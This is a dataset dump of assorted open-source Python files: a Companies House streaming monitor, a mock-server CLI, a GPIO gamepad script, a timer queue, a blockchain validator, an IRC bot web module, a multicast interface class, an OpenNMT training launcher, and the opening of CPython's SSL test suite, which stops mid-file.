source
stringlengths 3
86
| python
stringlengths 75
1.04M
|
|---|---|
chsmonitor.py
|
"""
Fetch the Companies House company registry using the streaming API.
"""
import json
import requests
import sling
import sling.flags as flags
import sling.crawl.chs as chs
import sys
import time
import traceback
from threading import Thread
from queue import Queue
flags.define("--chskeys",
help="Companies House API key file",
default="local/keys/chs.txt",
metavar="FILE")
flags.define("--chsdb",
help="database for storing Companies House records",
default="chs",
metavar="DB")
flags.define("--checkpoint",
help="File with latest checkpoint",
default=None,
metavar="FILE")
flags.define("--checkpoint_interval",
help="How often checkpoint is written to disk (seconds)",
default=60,
type=int,
metavar="NUM")
flags.define("--timepoint",
help="Retrieve events starting from a specific timepoint",
default=None,
type=int)
flags.define("--qsize",
help="Event queue size",
default=2000,
type=int,
metavar="NUM")
flags.define("--confirmations",
help="Only update when confirmation date is changed",
default=False,
action="store_true")
flags.parse()
chs.init(flags.arg.chskeys)
chsdb = sling.Database(flags.arg.chsdb, "chsmonitor")
num_changes = 0
checkpoint = None
# Determine timepoint for restart.
timepoint = flags.arg.timepoint
if timepoint is None and flags.arg.checkpoint is not None:
try:
with open(flags.arg.checkpoint, 'r') as ckpt:
timepoint = int(ckpt.read())
except:
print("No checkpoint file:", flags.arg.checkpoint)
# Convert date from YYYY-MM-DD to SLING format.
def get_date(s):
if len(s) == 0: return None
year = int(s[0:4])
month = int(s[5:7])
day = int(s[8:10])
return year * 10000 + month * 100 + day
# Get confirmation date for company.
def get_confirmation(company):
if company is None: return None
if "confirmation_statement" not in company: return None
confstmt = company["confirmation_statement"]
if "last_made_up_to" not in confstmt: return None
return get_date(confstmt["last_made_up_to"])
# Look up company in database.
def lookup_company(company_no):
data = chsdb[company_no]
if data is None: return None
return json.loads(data)
# Event handler.
def process_message(msg):
event = msg["event"]
ts = event["published_at"]
timepoint = int(event["timepoint"])
if msg["resource_kind"] != "company-profile":
print("***", json.dumps(msg, indent=2))
return
# Get company information.
version = stream.timepoint
company = msg["data"]
company_no = company["company_number"]
company_name = company["company_name"]
# Check if confirmation date has changed in confirmation mode.
skip = False
if flags.arg.confirmations:
current = lookup_company(company_no)
latest_confirmation = get_confirmation(company)
current_confirmation = get_confirmation(current)
if latest_confirmation != None and current_confirmation != None:
if current_confirmation >= latest_confirmation:
skip = True
result = "skip"
# Fetch company profile from Companies House.
if not skip:
# Fetch officers and owners.
chs.retrieve_officers(company)
chs.retrieve_owners(company)
# Write company record to database.
result = chsdb.put(company_no, json.dumps(company),
version=version, mode=sling.DBORDERED)
print(timepoint, ts, company_no, company_name, result, chs.quota_left)
sys.stdout.flush()
global checkpoint
checkpoint = timepoint
# Set up event queue.
def worker():
while True:
msg = queue.get()
try:
process_message(msg)
except Exception as e:
print("Error processing message:", msg)
traceback.print_exc(file=sys.stdout)
finally:
queue.task_done()
queue = Queue(flags.arg.qsize)
t = Thread(target=worker)
t.daemon = True
t.start()
# Checkpoint thread.
def checkpointer():
global checkpoint
while True:
if checkpoint != None:
print("CHECKPOINT", checkpoint, "QUEUE:", queue.qsize())
with open(flags.arg.checkpoint, 'w') as ckpt:
ckpt.write(str(checkpoint))
checkpoint = None
sys.stdout.flush()
time.sleep(flags.arg.checkpoint_interval)
if flags.arg.checkpoint != None:
t = Thread(target=checkpointer)
t.daemon = True
t.start()
# Receive events from Companies House streaming service.
stream = chs.CHSStream(timepoint)
while True:
try:
for msg in stream:
queue.put(msg)
except requests.exceptions.ChunkedEncodingError:
print("Stream closed")
sys.stdout.flush()
if flags.arg.confirmations:
time.sleep(60)
else:
time.sleep(60 + queue.qsize())
except Exception as e:
print("Event error", type(e), ":", e)
traceback.print_exc(file=sys.stdout)
sys.stdout.flush()
time.sleep(60)
|
manager.py
|
import argparse
import webbrowser
import json
import traceback
import socket
import threading
import signal
import os
from pathlib import Path
from lyrebird import log
from lyrebird import application
from lyrebird.config import Rescource, ConfigManager
from lyrebird.mock.mock_server import LyrebirdMockServer
from lyrebird.proxy.proxy_server import LyrebirdProxyServer
from lyrebird.event import EventServer
from lyrebird.task import BackgroundTaskServer
logger = log.get_logger()
def main():
"""
Command line main entry
Start lyrebird
* start in default config
```
lyrebird
```
* start with verbose mode
```
lyrebird -v
```
* start without open a web browser
```
lyrebird -b
```
* start with a specified config file
```
lyrebird -c /path/to/your/config/file
```
* start with multipart args
```
lyrebird -v --mock 8080 -c /path/to/your/config/file
```
"""
parser = argparse.ArgumentParser(prog='lyrebird')
parser.add_argument('-v', dest='verbose', action='store_true', help='Show verbose log')
parser.add_argument('--mock', dest='mock', type=int, help='Set mock server port, default port is 4272')
parser.add_argument('--proxy', dest='proxy', type=int, help='Set proxy server port, default port is 9090')
parser.add_argument('--data', dest='data', help='Set data dir, default is "./data/"')
parser.add_argument('-b', '--no_browser', dest='no_browser', action='store_true', help='Start without open a browser')
parser.add_argument('-c', '--config', dest='config', help='Start with a config file. Default is "~/.lyrebird/conf.json"')
parser.add_argument('--log', dest='log', help='Set output log file path')
subparser = parser.add_subparsers(dest='sub_command')
src_parser = subparser.add_parser('src')
src_parser.add_argument('uri')
subparser.add_parser('plugin')
args = parser.parse_args()
if args.config:
application._cm = ConfigManager(conf_path=args.config)
else:
application._cm = ConfigManager()
application._src = Rescource()
# set current ip to config
try:
application._cm.config['ip'] = _get_ip()
except socket.gaierror as e:
logger.error('Failed to get local IP address, error occurs on %s' % e)
if args.verbose:
application._cm.config['verbose'] = True
# init file logger after config init
log.init(args.log)
if args.mock:
application._cm.config['mock.port'] = args.mock
if args.proxy:
application._cm.config['proxy.port'] = args.proxy
if args.data:
application._cm.config['mock.data'] = args.data
logger.debug(f'Read args: {args}')
if args.sub_command == 'src':
logger.debug('EXEC SUBCMD:SRC')
src(args)
elif args.sub_command == 'plugin':
logger.debug('EXEC SUBCMD:PLUGIN')
plugin(args)
else:
logger.debug('EXEC LYREBIRD START')
run(args)
def run(args:argparse.Namespace):
# Check mock data group version. Update if is older than 1.x
from . import mock_data_formater
data_path = application._cm.config['mock.data']
data_dir = Path(data_path)
mock_data_formater.check_data_dir(data_dir)
# show current config contents
config_str = json.dumps(application._cm.config, ensure_ascii=False, indent=4)
logger.warning(f'Lyrebird start with config:\n{config_str}')
application.server['event'] = EventServer()
application.server['task'] = BackgroundTaskServer()
application.server['proxy'] = LyrebirdProxyServer()
application.server['mock'] = LyrebirdMockServer()
application.start_server()
# auto open web browser
if not args.no_browser:
webbrowser.open(f'http://localhost:{application.config["mock.port"]}')
# stop event handler
def signal_handler(signum, frame):
application.stop_server()
threading.Event().set()
logger.warning('!!!Ctrl-C pressed. Lyrebird stop!!!')
os._exit(1)
signal.signal(signal.SIGINT, signal_handler)
signal.signal(signal.SIGTERM, signal_handler)
def debug():
# use lyrebird.debug to start plugin in debug mode
# can pass args by sys.args
main()
# main thread loop
import asyncio
loop = asyncio.get_event_loop()
loop.run_forever()
def plugin(args:argparse.Namespace):
pass
def src(args:argparse.Namespace):
from threading import Thread
def worker():
application._src.download(args.uri)
Thread(target=worker).start()
def _get_ip():
"""
Get local ip from socket connection
:return: IP Addr string
"""
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s.connect(('meituan.com', 80))
return s.getsockname()[0]
|
gamepad_ns_gpio.py
|
"""
Demonstrate use of the NSGamepad class with GPIO pins. nsgamepad_usb must
be run first to create the USB gadget.
$ sudo apt update
$ sudo apt install gpiozero
Must be run as root like this:
$ sudo ./ns_gamepad_usb
$ cd Code
$ sudo python3 gamepad_ns_gpio.py
"""
import time
import threading
import signal
from gpiozero import Button
from NSGamepad import *
Gamepad = NSGamepad()
# Map the 4 direction buttons (up, right, down, left) to NS direction pad values
BUTTONS_MAP_DPAD = array.array('B', [
# U = Up button, R = right button, etc
# LDRU
DPad.CENTERED, # 0000
DPad.UP, # 0001
DPad.RIGHT, # 0010
DPad.UP_RIGHT, # 0011
DPad.DOWN, # 0100
DPad.CENTERED, # 0101
DPad.DOWN_RIGHT, # 0110
DPad.CENTERED, # 0111
DPad.LEFT, # 1000
DPad.UP_LEFT, # 1001
DPad.CENTERED, # 1010
DPad.CENTERED, # 1011
DPad.DOWN_LEFT, # 1100
DPad.CENTERED, # 1101
DPad.CENTERED, # 1110
DPad.CENTERED # 1111
])
class DpadBits(object):
""" Convert 4 direction buttons to direction pad values """
def __init__(self):
self.dpad_bits = 0
def set_bit(self, bit_num):
""" Set bit in direction pad bit map. Update NSGadget direction pad. """
self.dpad_bits |= (1 << bit_num)
return BUTTONS_MAP_DPAD[self.dpad_bits]
def clear_bit(self, bit_num):
""" Clear bit in direction pad bit map. Update NSGadget direction pad. """
self.dpad_bits &= ~(1 << bit_num)
return BUTTONS_MAP_DPAD[self.dpad_bits]
def gpio_handler():
""" Thread to handle buttons connected to GPIO pins. """
all_buttons = {}
dpad_bits = DpadBits()
def gpio_pressed(button):
""" Called when button connected to GPIO pin is pressed/closed """
print('pressed', button.pin)
if button.pin in all_buttons:
ns_button = all_buttons[button.pin]
if ns_button < 128:
Gamepad.press(ns_button)
else:
Gamepad.dPad(dpad_bits.set_bit(255 - ns_button))
else:
print('Invalid button');
def gpio_released(button):
""" Called when button connected to GPIO pin is released/opened """
print('released', button.pin)
if button.pin in all_buttons:
ns_button = all_buttons[button.pin]
if ns_button < 128:
Gamepad.release(ns_button)
else:
Gamepad.dPad(dpad_bits.clear_bit(255 - ns_button))
else:
print('Invalid button');
gpio_ns_map = (
# Left side (blue joy-con) buttons
{'gpio_number': 4, 'ns_button': NSButton.LEFT_THROTTLE},
{'gpio_number': 17, 'ns_button': NSButton.LEFT_TRIGGER},
{'gpio_number': 27, 'ns_button': NSButton.MINUS},
{'gpio_number': 22, 'ns_button': NSButton.CAPTURE},
{'gpio_number': 5, 'ns_button': 255},
{'gpio_number': 6, 'ns_button': 254},
{'gpio_number': 13, 'ns_button': 253},
{'gpio_number': 19, 'ns_button': 252},
{'gpio_number': 26, 'ns_button': NSButton.LEFT_STICK},
# Right side (red joy-con) buttons
{'gpio_number': 23, 'ns_button': NSButton.RIGHT_THROTTLE},
{'gpio_number': 24, 'ns_button': NSButton.RIGHT_TRIGGER},
{'gpio_number': 25, 'ns_button': NSButton.PLUS},
{'gpio_number': 8, 'ns_button': NSButton.HOME},
{'gpio_number': 7, 'ns_button': NSButton.A},
{'gpio_number': 12, 'ns_button': NSButton.B},
{'gpio_number': 16, 'ns_button': NSButton.X},
{'gpio_number': 20, 'ns_button': NSButton.Y},
{'gpio_number': 21, 'ns_button': NSButton.RIGHT_STICK}
)
# For each GPIO to NS button entry, allocate gpiozero Button object
# and update all_buttons dictionary. The when_pressed and when_released
# callback functions use all_buttons to find the corresponding
# NS button value.
for element in gpio_ns_map:
element['button'] = Button(element['gpio_number'])
all_buttons[element['button'].pin] = element['ns_button']
element['button'].when_pressed = gpio_pressed
element['button'].when_released = gpio_released
signal.pause()
def main():
""" main program """
threading.Thread(target=gpio_handler, args=(), daemon=True).start()
Gamepad.begin('/dev/hidg0')
while True:
""" Read from keyboard and mouse input using evdev? """
pass
if __name__ == "__main__":
main()
|
timer_queue.py
|
# Copyright 2016 Splunk, Inc.
# SPDX-FileCopyrightText: 2020 2020
#
# SPDX-License-Identifier: Apache-2.0
"""
A simple thread safe timer queue implementation which has O(logn) time complexity.
"""
try:
import queue as Queue
except ImportError:
import Queue
import logging
import threading
import traceback
from time import time
import sortedcontainers as sc
__all__ = ["Timer", "TimerQueueStruct", "TimerQueue"]
class Timer(object):
"""Timer wraps the callback and timestamp related attributes.
:param callback: Arbitrary callable object.
:type callback: ``callable object``
:param when: The first expiration time, seconds since epoch.
:type when: ``integer``
:param interval: Timer interval, if equals 0, one time timer, otherwise
the timer will be periodically executed
:type interval: ``integer``
:param ident: (optional) Timer identity.
:type ident: ``integer``
"""
_ident = 0
_lock = threading.Lock()
def __init__(self, callback, when, interval, ident=None):
self._callback = callback
self.when = when
self.interval = interval
if ident is not None:
self.ident = ident
else:
with Timer._lock:
self.ident = Timer._ident + 1
Timer._ident = Timer._ident + 1
def update_expiration(self):
self.when += self.interval
def __hash__(self):
return hash(self.ident)
def __eq__(self, other):
return isinstance(other, Timer) and (self.ident == other.ident)
def __lt__(self, other):
return (self.when, self.ident) < (other.when, other.ident)
def __le__(self, other):
return (self.when, self.ident) <= (other.when, other.ident)
def __gt__(self, other):
return (self.when, self.ident) > (other.when, other.ident)
def __ge__(self, other):
return (self.when, self.ident) >= (other.when, other.ident)
def __call__(self):
self._callback()
TEARDOWN_SENTINEL = None
class TimerQueueStruct(object):
"""
The underlying data structure for TimerQueue
"""
def __init__(self):
self._timers = sc.SortedSet()
self._cancelling_timers = {}
def add_timer(self, callback, when, interval, ident):
"""Add timer to the data structure.
:param callback: Arbitrary callable object.
:type callback: ``callable object``
:param when: The first expiration time, seconds since epoch.
:type when: ``integer``
:param interval: Timer interval, if equals 0, one time timer, otherwise
the timer will be periodically executed
:type interval: ``integer``
:param ident: (optional) Timer identity.
:type ident: ``integer``
:returns: A timer object which should not be manipulated directly by
clients. Used to delete/update the timer
:rtype: ``solnlib.timer_queue.Timer``
"""
timer = Timer(callback, when, interval, ident)
self._timers.add(timer)
return timer
def remove_timer(self, timer):
"""Remove timer from data structure.
:param timer: Timer object which is returned by ``TimerQueueStruct.add_timer``.
:type timer: ``Timer``
"""
try:
self._timers.remove(timer)
except ValueError:
logging.info(
"Timer=%s is not in queue, move it to cancelling " "list", timer.ident
)
else:
self._cancelling_timers[timer.ident] = timer
def get_expired_timers(self):
"""Get a list of expired timers.
:returns: a list of ``Timer``, empty list if there is no expired
timers.
:rtype: ``list``
"""
next_expired_time = 0
now = time()
expired_timers = []
for timer in self._timers:
if timer.when <= now:
expired_timers.append(timer)
if expired_timers:
del self._timers[: len(expired_timers)]
if self._timers:
next_expired_time = self._timers[0].when
return (next_expired_time, expired_timers)
def reset_timers(self, expired_timers):
"""Re-add the expired periodical timers to data structure for next
round scheduling.
:returns: True if there are timers added, False otherwise.
:rtype: ``bool``
"""
has_new_timer = False
cancelling_timers = self._cancelling_timers
for timer in expired_timers:
if timer.ident in cancelling_timers:
logging.INFO("Timer=%s has been cancelled", timer.ident)
continue
elif timer.interval:
# Repeated timer
timer.update_expiration()
self._timers.add(timer)
has_new_timer = True
cancelling_timers.clear()
return has_new_timer
def check_and_execute(self):
"""Get expired timers and execute callbacks for the timers.
:returns: duration of next expired timer.
:rtype: ``float``
"""
(next_expired_time, expired_timers) = self.get_expired_timers()
for timer in expired_timers:
try:
timer()
except Exception:
logging.error(traceback.format_exc())
self.reset_timers(expired_timers)
return _calc_sleep_time(next_expired_time)
class TimerQueue(object):
"""A simple timer queue implementation.
It runs a separate thread to handle timers Note: to effectively use this
timer queue, the timer callback should be short, otherwise it will cause
other timers's delay execution. A typical use scenario in production is
that the timers are just a simple functions which inject themselvies to
a task queue and then they are picked up by a threading/process pool to
execute, as shows below:
Timers --enqueue---> TimerQueue --------expiration-----------
|
|
\|/
Threading/Process Pool <---- TaskQueue <--enqueue-- Timers' callback (nonblocking)
Usage::
>>> from solnlib import time_queue
>>> tq = time_queue.TimerQueue()
>>> tq.start()
>>> t = tq.add_timer(my_func, time.time(), 10)
>>> # do other stuff
>>> tq.stop()
"""
def __init__(self):
self._timers = TimerQueueStruct()
self._lock = threading.Lock()
self._wakeup_queue = Queue.Queue()
self._thr = threading.Thread(target=self._check_and_execute)
self._thr.daemon = True
self._started = False
def start(self):
"""Start the timer queue."""
if self._started:
return
self._started = True
self._thr.start()
logging.info("TimerQueue started.")
def stop(self):
"""Stop the timer queue."""
if not self._started:
return
self._started = True
self._wakeup(TEARDOWN_SENTINEL)
self._thr.join()
def add_timer(self, callback, when, interval, ident=None):
"""Add timer to the queue.
:param callback: Arbitrary callable object.
:type callback: ``callable object``
:param when: The first expiration time, seconds since epoch.
:type when: ``integer``
:param interval: Timer interval, if equals 0, one time timer, otherwise
the timer will be periodically executed
:type interval: ``integer``
:param ident: (optional) Timer identity.
:type ident: ``integer``
:returns: A timer object which should not be manipulated directly by
clients. Used to delete/update the timer
"""
with self._lock:
timer = self._timers.add_timer(callback, when, interval, ident)
self._wakeup()
return timer
def remove_timer(self, timer):
"""Remove timer from the queue.
:param timer: Timer object which is returned by ``TimerQueue.add_timer``.
:type timer: ``Timer``
"""
with self._lock:
self._timers.remove_timer(timer)
def _check_and_execute(self):
wakeup_queue = self._wakeup_queue
while 1:
(next_expired_time, expired_timers) = self._get_expired_timers()
for timer in expired_timers:
try:
# Note, please make timer callback effective/short
timer()
except Exception:
logging.error(traceback.format_exc())
self._reset_timers(expired_timers)
sleep_time = _calc_sleep_time(next_expired_time)
try:
wakeup = wakeup_queue.get(timeout=sleep_time)
if wakeup is TEARDOWN_SENTINEL:
break
except Queue.Empty:
pass
logging.info("TimerQueue stopped.")
def _get_expired_timers(self):
with self._lock:
return self._timers.get_expired_timers()
def _reset_timers(self, expired_timers):
with self._lock:
has_new_timer = self._timers.reset_timers(expired_timers)
if has_new_timer:
self._wakeup()
def _wakeup(self, something="not_None"):
self._wakeup_queue.put(something)
def _calc_sleep_time(next_expired_time):
if next_expired_time:
now = time()
if now < next_expired_time:
sleep_time = next_expired_time - now
else:
sleep_time = 0.1
else:
sleep_time = 1
return sleep_time
|
parallel_validation.py
|
# Copyright © 2020 Interplanetary Database Association e.V.,
# BigchainDB and IPDB software contributors.
# SPDX-License-Identifier: (Apache-2.0 AND CC-BY-4.0)
# Code is Apache-2.0 and docs are CC-BY-4.0
import multiprocessing as mp
from collections import defaultdict
from multichaindb import App, MultiChainDB
from multichaindb.tendermint_utils import decode_transaction
from abci import CodeTypeOk
class ParallelValidationApp(App):
def __init__(self, multichaindb=None, events_queue=None, abci=None):
super().__init__(multichaindb, events_queue, abci=abci)
self.parallel_validator = ParallelValidator()
self.parallel_validator.start()
def check_tx(self, raw_transaction):
return self.abci.ResponseCheckTx(code=CodeTypeOk)
def deliver_tx(self, raw_transaction):
self.parallel_validator.validate(raw_transaction)
return self.abci.ResponseDeliverTx(code=CodeTypeOk)
def end_block(self, request_end_block):
result = self.parallel_validator.result(timeout=30)
for transaction in result:
if transaction:
self.block_txn_ids.append(transaction.id)
self.block_transactions.append(transaction)
return super().end_block(request_end_block)
RESET = 'reset'
EXIT = 'exit'
class ParallelValidator:
def __init__(self, number_of_workers=mp.cpu_count()):
self.number_of_workers = number_of_workers
self.transaction_index = 0
self.routing_queues = [mp.Queue() for _ in range(self.number_of_workers)]
self.workers = []
self.results_queue = mp.Queue()
def start(self):
for routing_queue in self.routing_queues:
worker = ValidationWorker(routing_queue, self.results_queue)
process = mp.Process(target=worker.run)
process.start()
self.workers.append(process)
def stop(self):
for routing_queue in self.routing_queues:
routing_queue.put(EXIT)
def validate(self, raw_transaction):
dict_transaction = decode_transaction(raw_transaction)
index = int(dict_transaction['id'], 16) % self.number_of_workers
self.routing_queues[index].put((self.transaction_index, dict_transaction))
self.transaction_index += 1
def result(self, timeout=None):
result_buffer = [None] * self.transaction_index
for _ in range(self.transaction_index):
index, transaction = self.results_queue.get(timeout=timeout)
result_buffer[index] = transaction
self.transaction_index = 0
for routing_queue in self.routing_queues:
routing_queue.put(RESET)
return result_buffer
class ValidationWorker:
"""Run validation logic in a loop. This Worker is suitable for a Process
life: no thrills, just a queue to get some values, and a queue to return results.
Note that a worker is expected to validate multiple transactions in
multiple rounds, and it needs to keep in memory all transactions already
validated, until a new round starts. To trigger a new round of validation,
a ValidationWorker expects a `RESET` message. To exit the infinite loop the
worker is in, it expects an `EXIT` message.
"""
def __init__(self, in_queue, results_queue):
self.in_queue = in_queue
self.results_queue = results_queue
self.multichaindb = MultiChainDB()
self.reset()
def reset(self):
# We need a place to store already validated transactions,
# in case of dependant transactions in the same block.
# `validated_transactions` maps an `asset_id` with the list
# of all other transactions sharing the same asset.
self.validated_transactions = defaultdict(list)
def validate(self, dict_transaction):
try:
asset_id = dict_transaction['asset']['id']
except KeyError:
asset_id = dict_transaction['id']
transaction = self.multichaindb.is_valid_transaction(
dict_transaction,
self.validated_transactions[asset_id])
if transaction:
self.validated_transactions[asset_id].append(transaction)
return transaction
def run(self):
while True:
message = self.in_queue.get()
if message == RESET:
self.reset()
elif message == EXIT:
return
else:
index, transaction = message
self.results_queue.put((index, self.validate(transaction)))
|
androidServiceModule.py
|
from ircBase import *
from bottle import route, run, template
import apTrackingModule
import time
import datetime
import ConfigParser
from multiprocessing import Process
config = ConfigParser.SafeConfigParser()
config.read('configs/ircBase.conf')
CONST_DB_USER = config.get('MySql', 'username')
CONST_DB_PASSWORD = config.get('MySql', 'password')
def setup_server(theHost, thePort, theModule):
route('/<action>/<name>')(theModule.index)
run(host=theHost, port=thePort)
class AndroidServiceModule(IrcModule):
def defineResponses(self):
t = Process(target=setup_server, kwargs=dict(theHost='0.0.0.0', thePort=31337, theModule=self))
t.start()
def index(self, action, name):
#Open Database Connection
databaseConnection = mdb.connect('localhost', CONST_DB_USER, CONST_DB_PASSWORD)
#Perform ap tracking action for stats
returnMessage = ''
if(action=='stats'):
statsMessage = apTrackingModule.getApStatsForNick(databaseConnection, name)
returnMessage = '{'
if 'drinking' in statsMessage:
returnMessage += '"currentAP":"true",'
returnMessage += '"message":"' + statsMessage + '"}'
#Perform ap tracking action for start
if(action=='start'):
startMessage = apTrackingModule.startTrackingApForNick(databaseConnection, name)
if 'Bottoms' in startMessage:
self.ircBot.irc.sendMessage(IrcMessage.newRoomMessage(name + ' has started drinking an AP. ' + startMessage))
returnMessage = '{"message":"' + startMessage + '"}'
#Perform ap tracking action for stop
if(action=='stop'):
stopMessage = apTrackingModule.stopTrackingApForNick(databaseConnection, name)
if 'took' in stopMessage:
self.ircBot.irc.sendMessage(IrcMessage.newRoomMessage(stopMessage.replace('you',name)))
returnMessage = '{"message":"' + stopMessage + '"}'
#Close Database Connection
databaseConnection.close()
return returnMessage
|
Interface.py
|
import socket
import struct
import threading
import netifaces
import ipaddress
import traceback
from fcntl import ioctl
from abc import ABCMeta, abstractmethod
SIOCGIFMTU = 0x8921
class Interface(metaclass=ABCMeta):
def __init__(self, interface_name, recv_socket, send_socket, vif_index):
self.interface_name = interface_name
# virtual interface index for the multicast routing table
self.vif_index = vif_index
# set receive socket and send socket
self._send_socket = send_socket
self._recv_socket = recv_socket
self.interface_enabled = False
def enable(self):
"""
Enable this interface
This will start a thread to be executed in the background to be used in the reception of control packets
"""
self.interface_enabled = True
# run receive method in background
receive_thread = threading.Thread(target=self.receive)
receive_thread.daemon = True
receive_thread.start()
def receive(self):
"""
Method that will be executed in the background for the reception of control packets
"""
while self.interface_enabled:
try:
(raw_bytes, src_addr) = self._recv_socket.recvfrom(256 * 1024)
if raw_bytes:
self._receive(raw_bytes, src_addr)
except Exception:
traceback.print_exc()
continue
@abstractmethod
def _receive(self, raw_bytes, src_addr):
"""
Subclass method to be implemented
This method will be invoked whenever a new control packet is received
"""
raise NotImplementedError
def send(self, data: bytes, group_ip: str):
"""
Send a control packet through this interface
Explicitly destined to group_ip (can be unicast or multicast IP)
"""
if self.interface_enabled and data:
try:
self._send_socket.sendto(data, (group_ip, 0))
except socket.error:
pass
def remove(self):
"""
This interface is no longer active....
Clear all state regarding it
"""
self.interface_enabled = False
try:
self._recv_socket.shutdown(socket.SHUT_RDWR)
except Exception:
pass
self._recv_socket.close()
self._send_socket.close()
def is_enabled(self):
"""
Verify if this interface is enabled
"""
return self.interface_enabled
@abstractmethod
def get_ip(self):
"""
Get IP of this interface
"""
raise NotImplementedError
def get_all_interface_networks(self):
"""
Get all subnets associated with this interface.
Used to verify if interface is directly connected to a multicast source
This is extremely relevant on IPv6, where an interface can be connected to multiple subnets (global, link-local,
unique-local)
"""
all_networks = set()
for if_addr in netifaces.ifaddresses(self.interface_name)[self._get_address_family()]:
ip_addr = if_addr["addr"].split("%")[0]
netmask = if_addr["netmask"].split("/")[0]
prefix_length = str(bin(int(ipaddress.ip_address(netmask).packed.hex(), 16)).count('1'))
network = ip_addr + "/" + prefix_length
all_networks.add(str(ipaddress.ip_interface(network).network))
return all_networks
@staticmethod
@abstractmethod
def _get_address_family():
raise NotImplementedError
def get_mtu(self):
"""
Get MTU of this interface
"""
'''Use socket ioctl call to get MTU size'''
s = socket.socket(type=socket.SOCK_DGRAM)
ifr = self.interface_name + '\x00'*(32-len(self.interface_name))
try:
ifs = ioctl(s, SIOCGIFMTU, ifr)
mtu = struct.unpack('<H', ifs[16:18])[0]
except:
traceback.print_exc()
raise
#log.debug('get_mtu: mtu of {0} = {1}'.format(self.ifname, mtu))
return mtu
|
train.py
|
#!/usr/bin/env python
"""
Main training workflow
"""
import configargparse
import os
import signal
import torch
import onmt.opts as opts
import onmt.utils.distributed
from onmt.utils.logging import logger
from onmt.train_single import main as single_main
def parse_args():
parser = configargparse.ArgumentParser(
description='train.py',
config_file_parser_class=configargparse.YAMLConfigFileParser,
formatter_class=configargparse.ArgumentDefaultsHelpFormatter)
opts.general_opts(parser)
opts.config_opts(parser)
opts.add_md_help_argument(parser)
opts.model_opts(parser)
opts.train_opts(parser)
opt = parser.parse_args()
return opt
def run(opt, device_id, error_queue):
""" run process """
try:
gpu_rank = onmt.utils.distributed.multi_init(opt, device_id)
if gpu_rank != opt.gpu_ranks[device_id]:
raise AssertionError("An error occurred in \
Distributed initialization")
single_main(opt, device_id)
except KeyboardInterrupt:
pass # killed by parent, do nothing
except Exception:
# propagate exception to parent process, keeping original traceback
import traceback
error_queue.put((opt.gpu_ranks[device_id], traceback.format_exc()))
class ErrorHandler(object):
"""A class that listens for exceptions in children processes and propagates
the tracebacks to the parent process."""
def __init__(self, error_queue):
""" init error handler """
import signal
import threading
self.error_queue = error_queue
self.children_pids = []
self.error_thread = threading.Thread(
target=self.error_listener, daemon=True)
self.error_thread.start()
signal.signal(signal.SIGUSR1, self.signal_handler)
def add_child(self, pid):
""" error handler """
self.children_pids.append(pid)
def error_listener(self):
""" error listener """
(rank, original_trace) = self.error_queue.get()
self.error_queue.put((rank, original_trace))
os.kill(os.getpid(), signal.SIGUSR1)
def signal_handler(self, signalnum, stackframe):
""" signal handler """
for pid in self.children_pids:
os.kill(pid, signal.SIGINT) # kill children processes
(rank, original_trace) = self.error_queue.get()
msg = """\n\n-- Tracebacks above this line can probably
be ignored --\n\n"""
msg += original_trace
raise Exception(msg)
def main():
opt = parse_args()
print(
"[train.py] opt.model_mode: {}, opt.model_mode2: {}, opt.model_ffn_mode: {}"
.format(opt.model_mode, opt.model_mode2, opt.model_ffn_mode)
)
if opt.rnn_type == "SRU" and not opt.gpu_ranks:
raise AssertionError("Using SRU requires -gpu_ranks set.")
if opt.epochs:
raise AssertionError("-epochs is deprecated please use -train_steps.")
if opt.truncated_decoder > 0 and opt.accum_count > 1:
raise AssertionError("BPTT is not compatible with -accum > 1")
if opt.gpuid:
raise AssertionError("gpuid is deprecated \
see world_size and gpu_ranks")
nb_gpu = len(opt.gpu_ranks)
if opt.world_size > 1:
mp = torch.multiprocessing.get_context('spawn')
# Create a thread to listen for errors in the child processes.
error_queue = mp.SimpleQueue()
error_handler = ErrorHandler(error_queue)
# Train with multiprocessing.
procs = []
for device_id in range(nb_gpu):
procs.append(mp.Process(target=run, args=(
opt, device_id, error_queue, ), daemon=True))
procs[device_id].start()
logger.info(" Starting process pid: %d " % procs[device_id].pid)
error_handler.add_child(procs[device_id].pid)
for p in procs:
p.join()
elif nb_gpu == 1: # case 1 GPU only
single_main(opt, 0)
else: # case only CPU
single_main(opt, -1)
if __name__ == "__main__":
main()
|
test_ssl.py
|
# Test the support for SSL and sockets
import sys
import unittest
import unittest.mock
from test import support
from test.support import import_helper
from test.support import os_helper
from test.support import socket_helper
from test.support import threading_helper
from test.support import warnings_helper
import socket
import select
import time
import datetime
import enum
import gc
import os
import errno
import pprint
import urllib.request
import threading
import traceback
import asyncore
import weakref
import platform
import sysconfig
import functools
try:
import ctypes
except ImportError:
ctypes = None
ssl = import_helper.import_module("ssl")
from ssl import TLSVersion, _TLSContentType, _TLSMessageType, _TLSAlertType
Py_DEBUG = hasattr(sys, 'gettotalrefcount')
Py_DEBUG_WIN32 = Py_DEBUG and sys.platform == 'win32'
PROTOCOLS = sorted(ssl._PROTOCOL_NAMES)
HOST = socket_helper.HOST
IS_OPENSSL_3_0_0 = ssl.OPENSSL_VERSION_INFO >= (3, 0, 0)
PY_SSL_DEFAULT_CIPHERS = sysconfig.get_config_var('PY_SSL_DEFAULT_CIPHERS')
PROTOCOL_TO_TLS_VERSION = {}
for proto, ver in (
("PROTOCOL_SSLv23", "SSLv3"),
("PROTOCOL_TLSv1", "TLSv1"),
("PROTOCOL_TLSv1_1", "TLSv1_1"),
):
try:
proto = getattr(ssl, proto)
ver = getattr(ssl.TLSVersion, ver)
except AttributeError:
continue
PROTOCOL_TO_TLS_VERSION[proto] = ver
def data_file(*name):
return os.path.join(os.path.dirname(__file__), *name)
# The custom key and certificate files used in test_ssl are generated
# using Lib/test/make_ssl_certs.py.
# Other certificates are simply fetched from the Internet servers they
# are meant to authenticate.
CERTFILE = data_file("keycert.pem")
BYTES_CERTFILE = os.fsencode(CERTFILE)
ONLYCERT = data_file("ssl_cert.pem")
ONLYKEY = data_file("ssl_key.pem")
BYTES_ONLYCERT = os.fsencode(ONLYCERT)
BYTES_ONLYKEY = os.fsencode(ONLYKEY)
CERTFILE_PROTECTED = data_file("keycert.passwd.pem")
ONLYKEY_PROTECTED = data_file("ssl_key.passwd.pem")
KEY_PASSWORD = "somepass"
CAPATH = data_file("capath")
BYTES_CAPATH = os.fsencode(CAPATH)
CAFILE_NEURONIO = data_file("capath", "4e1295a3.0")
CAFILE_CACERT = data_file("capath", "5ed36f99.0")
CERTFILE_INFO = {
'issuer': ((('countryName', 'XY'),),
